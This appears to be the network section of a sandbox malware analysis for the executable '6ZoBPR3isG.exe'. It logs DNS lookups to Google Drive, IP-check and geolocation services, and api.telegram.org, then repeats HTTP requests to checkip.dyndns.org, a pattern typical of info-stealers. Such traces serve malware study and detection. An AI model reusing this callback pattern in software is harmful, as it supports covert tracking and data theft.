                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                            Jan 10, 2025 22:31:27.721029043 CET192.168.2.31.1.1.10x5e9aStandard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 22:31:28.809241056 CET192.168.2.31.1.1.10xa0d2Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 22:31:33.623233080 CET192.168.2.31.1.1.10x482aStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 22:31:35.086478949 CET192.168.2.31.1.1.10x4034Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 22:31:41.835819006 CET192.168.2.31.1.1.10x9d65Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                            Jan 10, 2025 22:30:44.982177019 CET1.1.1.1192.168.2.30xf559No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                            Jan 10, 2025 22:30:44.982177019 CET1.1.1.1192.168.2.30xf559No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 22:31:27.727757931 CET1.1.1.1192.168.2.30x5e9aNo error (0)drive.google.com172.217.16.206A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 22:31:28.818209887 CET1.1.1.1192.168.2.30xa0d2No error (0)drive.usercontent.google.com172.217.16.129A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 22:31:33.631084919 CET1.1.1.1192.168.2.30x482aNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                            Jan 10, 2025 22:31:33.631084919 CET1.1.1.1192.168.2.30x482aNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 22:31:33.631084919 CET1.1.1.1192.168.2.30x482aNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 22:31:33.631084919 CET1.1.1.1192.168.2.30x482aNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 22:31:33.631084919 CET1.1.1.1192.168.2.30x482aNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 22:31:33.631084919 CET1.1.1.1192.168.2.30x482aNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 22:31:35.093919992 CET1.1.1.1192.168.2.30x4034No error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 22:31:35.093919992 CET1.1.1.1192.168.2.30x4034No error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 22:31:35.093919992 CET1.1.1.1192.168.2.30x4034No error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 22:31:35.093919992 CET1.1.1.1192.168.2.30x4034No error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 22:31:35.093919992 CET1.1.1.1192.168.2.30x4034No error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 22:31:35.093919992 CET1.1.1.1192.168.2.30x4034No error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 22:31:35.093919992 CET1.1.1.1192.168.2.30x4034No error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 22:31:41.842905998 CET1.1.1.1192.168.2.30x9d65No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                            • drive.google.com
                                                                                                            • drive.usercontent.google.com
                                                                                                            • reallyfreegeoip.org
                                                                                                            • api.telegram.org
                                                                                                            • checkip.dyndns.org
                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            0192.168.2.349979132.226.247.73808068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 22:31:33.640458107 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 22:31:34.311220884 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 21:31:34 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                            Jan 10, 2025 22:31:34.316279888 CET127OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Jan 10, 2025 22:31:34.525429964 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 21:31:34 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                            Jan 10, 2025 22:31:41.614938974 CET127OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Jan 10, 2025 22:31:41.824558973 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 21:31:41 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            1192.168.2.349982132.226.247.73808068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 22:31:42.994663954 CET127OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Jan 10, 2025 22:31:43.683789968 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 21:31:43 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            2192.168.2.349984132.226.247.73808068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 22:31:44.673602104 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 22:31:45.355113029 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 21:31:45 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            3192.168.2.349987132.226.247.73808068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 22:31:46.384521961 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 22:31:47.079864025 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 21:31:46 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            4192.168.2.349989132.226.247.73808068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 22:31:48.092689991 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 22:31:48.800211906 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 21:31:48 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            5192.168.2.349991132.226.247.73808068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 22:31:49.921541929 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 22:31:50.607156038 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 21:31:50 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            6192.168.2.349993132.226.247.73808068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 22:31:51.616767883 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 22:31:52.294369936 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 21:31:52 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            7192.168.2.349995132.226.247.73808068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 22:31:53.250804901 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 22:31:53.936929941 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 21:31:53 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            8192.168.2.349997132.226.247.73808068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 22:31:54.991949081 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 22:31:55.731010914 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 21:31:55 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            9192.168.2.349999132.226.247.73808068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 22:31:56.658602953 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 22:31:57.339839935 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 21:31:57 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            10192.168.2.350001132.226.247.73808068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 22:31:58.511364937 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 22:31:59.215167046 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 21:31:59 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            11192.168.2.350003132.226.247.73808068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 22:32:00.221029043 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 22:32:00.918642044 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 21:32:00 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            12192.168.2.350005132.226.247.73808068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 22:32:02.075225115 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 22:32:02.769104004 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 21:32:02 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            13192.168.2.350007132.226.247.73808068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 22:32:03.705920935 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 22:32:04.397186995 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 21:32:04 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            14192.168.2.350009132.226.247.73808068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 22:32:05.339329958 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 22:32:06.012968063 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 21:32:05 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            15192.168.2.350011132.226.247.73808068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 22:32:06.854518890 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 22:32:07.542799950 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 21:32:07 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
